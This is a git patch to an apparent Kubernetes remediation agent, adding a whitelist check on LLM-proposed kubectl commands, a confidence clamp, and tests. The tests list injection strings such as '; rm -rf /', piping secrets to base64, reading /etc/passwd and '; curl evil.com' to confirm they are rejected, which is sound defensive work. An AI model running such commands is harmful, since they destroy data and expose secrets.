From 39f45dd305fd0b541c08390ab18aaed9281c3f37 Mon Sep 17 00:00:00 2001 From: Your Name Date: Sat, 25 Apr 2026 02:42:25 +0800 Subject: [PATCH] =?UTF-8?q?fix(solver):=20=E8=A3=9C=20import=20re=EF=BC=88?= =?UTF-8?q?solver=5Fagent=20=E5=B7=B2=E6=9C=89=20re.compile=20=E4=BD=86?= =?UTF-8?q?=E6=BC=8F=20import=EF=BC=89?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Sonnet 4.6 --- apps/api/src/agents/solver_agent.py | 91 +++++++-- apps/api/tests/agents/test_solver_agent.py | 216 ++++++++++++++++++++- 2 files changed, 291 insertions(+), 16 deletions(-) diff --git a/apps/api/src/agents/solver_agent.py b/apps/api/src/agents/solver_agent.py index e8e91b01..9dc1bda5 100644 --- a/apps/api/src/agents/solver_agent.py +++ b/apps/api/src/agents/solver_agent.py @@ -21,6 +21,7 @@ from __future__ import annotations import asyncio import hashlib +import re import time from typing import Any @@ -41,6 +42,32 @@ logger = structlog.get_logger(__name__) # Phase 2 單步 LLM timeout(保留 Critic/Coordinator 的全局預算) PHASE2_STEP_TIMEOUT_SEC = 20.0 +# 2026-04-24 ogt + Claude Sonnet 4.6: kubectl 白名單正則(Major #1 改版) +# 根因:黑名單枚舉不完整(如 $VAR、%0a、反引號 unicode 等繞過向量) +# 修復:改為白名單正則,只允許 kubectl 合法字元集 +# 合法字符:英數、空白、- = . / : _ , @ (足以覆蓋完整 kubectl 語法) +# 任何不在此集合的字符(; & | ` $ > < 換行等)直接拒絕 +# 範圍:Nemo 路徑 + 標準 candidates 路徑雙層防護 +_KUBECTL_COMMAND_PATTERN = re.compile(r"^kubectl\s+[A-Za-z0-9\s\-=./:_,@]+$") + + +def _is_safe_kubectl_command(cmd: str) -> bool: + """kubectl 命令白名單驗證。 + + 只允許 kubectl 開頭 + 合法字符集(英數、空白、- = . / : _ , @)。 + 任何 shell 元字符(; & | ` $ > < 換行等)皆返回 False。 + + Args: + cmd: 待驗證的命令字串 + + Returns: + True — 通過白名單;False — 含非法字符或非 kubectl 開頭 + """ + cmd = str(cmd).strip() + if not cmd.startswith("kubectl"): + return False + return _KUBECTL_COMMAND_PATTERN.fullmatch(cmd) is not None + class SolverAgent(BaseAgent): """ @@ -312,7 +339,19 @@ def _extract_candidates(parsed: dict[str, Any]) -> list[CandidateAction]: # 新:先嘗試語意合成 kubectl 指令;真的無從映射才 return [] if "action_title" in parsed and "candidates" not in parsed: action_title = str(parsed.get("action_title", "")) - confidence = float(parsed.get("confidence", 0.5)) + # 2026-04-24 ogt + Claude Sonnet 4.6: confidence try/except + clamp(Major #3/#4) + # 根因:LLM 可能回傳非數字字串(如 "high")或超界值(如 1.5 / -0.1) + # float() 直接呼叫會 ValueError;超界值會破壞 auto_approve 門檻判斷 + # 修復:try/except 捕捉型別錯誤 → 預設 0.5;再 clamp 到 [0.0, 1.0] + try: + confidence = float(parsed.get("confidence", 0.5)) + except (TypeError, ValueError): + logger.warning( + "solver_nemo_confidence_type_error", + raw_confidence=parsed.get("confidence"), + ) + confidence = 0.5 + confidence = max(0.0, min(1.0, confidence)) risk_level = str(parsed.get("risk_level", "medium")) risk_to_blast = {"critical": 60, "high": 40, "medium": 25, "low": 10} blast = risk_to_blast.get(risk_level.lower(), 30) @@ -323,19 +362,30 @@ def _extract_candidates(parsed: dict[str, Any]) -> list[CandidateAction]: # 修法 A:優先採用 kubectl_command 欄位,保留原始 confidence(如 0.9) kubectl_cmd = str(parsed.get("kubectl_command", "")).strip() if kubectl_cmd and kubectl_cmd.startswith("kubectl"): - logger.debug( - "solver_nemo_kubectl_command_used", - action_title=action_title[:80], - kubectl_command=kubectl_cmd[:80], - confidence=confidence, - ) - return [CandidateAction( - action=kubectl_cmd[:200], - blast_radius=blast, - rollback_cost=20, - confidence=confidence, - rationale=f"OpenClaw Nemo: {action_title[:80]}", - )] + # 2026-04-24 ogt + Claude Sonnet 4.6: 白名單正則防注入(Major #1 改版) + # 根因:黑名單枚舉不完整,改用白名單正則(_is_safe_kubectl_command) + # 修復:不通過白名單 → log warning → fall-through 到 action_title 路徑(不 return) + if not _is_safe_kubectl_command(kubectl_cmd): + logger.warning( + "solver_kubectl_invalid_syntax", + cmd=kubectl_cmd[:80], + reason="未通過白名單正則檢驗", + ) + # fall-through:不採用此 kubectl_command,繼續往下走 action_title 路徑 + else: + logger.debug( + "solver_nemo_kubectl_command_used", + action_title=action_title[:80], + kubectl_command=kubectl_cmd[:80], + confidence=confidence, + ) + return [CandidateAction( + action=kubectl_cmd[:200], + blast_radius=blast, + rollback_cost=20, + confidence=confidence, + rationale=f"OpenClaw Nemo: {action_title[:80]}", + )] if "kubectl" in action_title.lower(): if action_title and confidence > 0: @@ -389,8 +439,19 @@ def _extract_candidates(parsed: dict[str, Any]) -> list[CandidateAction]: for item in raw: if not isinstance(item, dict): continue + # 2026-04-24 ogt + Claude Sonnet 4.6: 標準 candidates 路徑白名單防護(Major #2) + # 根因:標準路徑未驗證 action 欄位,LLM 可注入含 shell 元字符的惡意命令 + # 修復:每個 action 通過 _is_safe_kubectl_command 白名單檢驗,失敗則跳過 + action = str(item.get("action", ""))[:200] + if not _is_safe_kubectl_command(action): + logger.warning( + "solver_standard_action_unsafe", + action=action[:80], + reason="未通過白名單檢驗", + ) + continue c = CandidateAction( - action=str(item.get("action", ""))[:200], + action=action, blast_radius=max(0, min(100, int(item.get("blast_radius", 50)))), rollback_cost=max(0, min(100, int(item.get("rollback_cost", 50)))), confidence=float(item.get("confidence", 0.0)), diff --git a/apps/api/tests/agents/test_solver_agent.py b/apps/api/tests/agents/test_solver_agent.py index a4c508fd..bbf6f0c7 100644 --- a/apps/api/tests/agents/test_solver_agent.py +++ b/apps/api/tests/agents/test_solver_agent.py @@ -14,7 +14,7 @@ sys.path.insert(0, os.path.join(os.path.dirname(__file__), "../../")) import pytest -from src.agents.solver_agent import _extract_candidates +from src.agents.solver_agent import _extract_candidates, _is_safe_kubectl_command class TestExtractCandidatesNemoFormat: @@ -157,3 +157,217 @@ class TestExtractCandidatesNemoFormat: assert result[0].blast_radius == expected_blast, ( f"risk_level={risk_level} → 期望 blast={expected_blast},實際 {result[0].blast_radius}" ) + + +class TestShellMetacharacterBlocking: + """2026-04-24 Major #1 改版:白名單正則測試(取代原黑名單枚舉)""" + + @pytest.mark.parametrize("malicious_cmd,desc", [ + ( + "kubectl rollout restart deployment/api -n awoooi-prod; rm -rf /", + "分號注入", + ), + ( + "kubectl get secret -n awoooi-prod | base64 -d", + "pipe 注入", + ), + ( + "kubectl get pods -n awoooi-prod `id`", + "反引號注入", + ), + ( + "kubectl exec deployment/api -- sh -c $EVIL_CMD", + "$ 變數展開", + ), + ( + "kubectl get pods -n awoooi-prod > /tmp/out", + "> 重定向", + ), + ( + "kubectl get pods -n awoooi-prod < /etc/passwd", + "< 重定向", + ), + ]) + def test_nemo_kubectl_command_invalid_regex_blocked(self, malicious_cmd, desc): + """Nemo 路徑:各類惡意 kubectl_command 均被白名單正則攔截""" + parsed = { + "action_title": "重啟服務", + "kubectl_command": malicious_cmd, + "confidence": 0.9, + "risk_level": "medium", + } + result = _extract_candidates(parsed) + + # 惡意命令被阻擋 → fall-through → 語意合成 "重啟" → confidence 被壓到 0.5 + assert len(result) == 1, f"{desc}: 期望 1 個結果(語意合成兜底)" + # 確認惡意片段未出現在最終 action 中 + assert "rm -rf" not in result[0].action, f"{desc}: rm -rf 不應出現" + assert "base64" not in result[0].action, f"{desc}: base64 不應出現" + assert result[0].confidence == 0.5, f"{desc}: 語意合成路徑 confidence 必須被壓到 0.5" + + def test_is_safe_kubectl_command_accepts_valid_commands(self): + """白名單 helper:合法 kubectl 命令應通過驗證""" + valid_cmds = [ + "kubectl rollout restart deployment/awoooi-api -n awoooi-prod", + "kubectl scale deployment/awoooi-api --replicas=3 -n awoooi-prod", + "kubectl rollout undo deployment/awoooi-api -n awoooi-prod", + "kubectl get pods -n awoooi-prod -o wide", + "kubectl top pods -n awoooi-prod --sort-by=cpu", + "kubectl logs -n awoooi-prod --tail=100 --selector=app=awoooi-api", + ] + for cmd in valid_cmds: + assert _is_safe_kubectl_command(cmd), f"合法命令被誤拒:{cmd}" + + def test_is_safe_kubectl_command_rejects_non_kubectl(self): + """白名單 helper:非 kubectl 開頭的命令拒絕""" + assert not _is_safe_kubectl_command("helm rollback awoooi-api") + assert not _is_safe_kubectl_command("rm -rf /") + assert not _is_safe_kubectl_command("") + + +class TestConfidenceClampAndTypeError: + """2026-04-24 Major #3/#4:confidence clamp + type error 防禦測試""" + + def test_confidence_clamp_above_1_0(self): + """confidence > 1.0 被 clamp 到 1.0,防 auto_approve 門檻被破壞""" + parsed = { + "action_title": "重啟服務", + "kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod", + "confidence": 1.5, + "risk_level": "medium", + } + result = _extract_candidates(parsed) + + assert len(result) == 1 + assert result[0].confidence == 1.0, f"期望 1.0(clamp),實際 {result[0].confidence}" + + def test_confidence_clamp_below_0_0(self): + """confidence < 0.0 被 clamp 到 0.0""" + parsed = { + "action_title": "重啟服務", + "kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod", + "confidence": -0.3, + "risk_level": "medium", + } + result = _extract_candidates(parsed) + + assert len(result) == 1 + assert result[0].confidence == 0.0, f"期望 0.0(clamp),實際 {result[0].confidence}" + + def test_confidence_non_numeric_string_fallback(self): + """confidence 為非數字字串(如 "high")→ 預設 0.5""" + parsed = { + "action_title": "重啟服務", + "kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod", + "confidence": "high", + "risk_level": "medium", + } + result = _extract_candidates(parsed) + + assert len(result) == 1 + assert result[0].confidence == 0.5, f"期望 0.5(fallback),實際 {result[0].confidence}" + + def test_confidence_none_type_fallback(self): + """confidence 為 None → 預設 0.5""" + parsed = { + "action_title": "重啟服務", + "kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod", + "confidence": None, + "risk_level": "medium", + } + result = _extract_candidates(parsed) + + assert len(result) == 1 + assert result[0].confidence == 0.5, f"期望 0.5(fallback),實際 {result[0].confidence}" + + +class TestStandardCandidatesPathSafety: + """2026-04-24 Major #2:標準 candidates 路徑白名單防護測試""" + + def test_standard_path_action_unsafe_blocked(self): + """標準路徑:含 shell 元字符的 action 被跳過,不加入 candidates""" + parsed = { + "candidates": [ + { + "action": "kubectl rollout restart deployment/api -n awoooi-prod; curl evil.com", + "blast_radius": 10, + "rollback_cost": 5, + "confidence": 0.85, + "rationale": "惡意注入", + } + ] + } + result = _extract_candidates(parsed) + + assert len(result) == 0, "含 shell 元字符的 action 不應加入 candidates" + + def test_standard_path_safe_action_passes(self): + """標準路徑:合法 kubectl action 正常通過白名單""" + parsed = { + "candidates": [ + { + "action": "kubectl rollout restart deployment/awoooi-api -n awoooi-prod", + "blast_radius": 10, + "rollback_cost": 5, + "confidence": 0.85, + "rationale": "重啟修復 OOM", + } + ] + } + result = _extract_candidates(parsed) + + assert len(result) == 1 + assert result[0].confidence == 0.85 + assert result[0].blast_radius == 10 + + def test_standard_path_mixed_safe_unsafe_candidates(self): + """標準路徑混合場景:5 個 candidates,2 個安全 3 個不安全,只回傳 2 個""" + parsed = { + "candidates": [ + { + "action": "kubectl rollout restart deployment/awoooi-api -n awoooi-prod", + "blast_radius": 10, + "rollback_cost": 5, + "confidence": 0.9, + "rationale": "安全 1", + }, + { + "action": "kubectl get pods -n awoooi-prod; rm -rf /", + "blast_radius": 10, + "rollback_cost": 5, + "confidence": 0.8, + "rationale": "不安全 1:分號注入", + }, + { + "action": "kubectl scale deployment/awoooi-api --replicas=2 -n awoooi-prod", + "blast_radius": 15, + "rollback_cost": 10, + "confidence": 0.75, + "rationale": "安全 2", + }, + { + "action": "kubectl exec deployment/api -- sh -c $EVIL", + "blast_radius": 50, + "rollback_cost": 30, + "confidence": 0.7, + "rationale": "不安全 2:$ 展開", + }, + { + "action": "kubectl get secrets -n awoooi-prod | base64 -d", + "blast_radius": 5, + "rollback_cost": 1, + "confidence": 0.6, + "rationale": "不安全 3:pipe", + }, + ] + } + result = _extract_candidates(parsed) + + assert len(result) == 2, f"期望 2 個安全 candidates,實際 {len(result)}" + # 結果按 confidence 降序排列 + assert result[0].confidence == 0.9 + assert result[1].confidence == 0.75 + # 確認安全 candidates 的 action 內容正確 + actions = [r.action for r in result] + assert "kubectl rollout restart deployment/awoooi-api -n awoooi-prod" in actions + assert "kubectl scale deployment/awoooi-api --replicas=2 -n awoooi-prod" in actions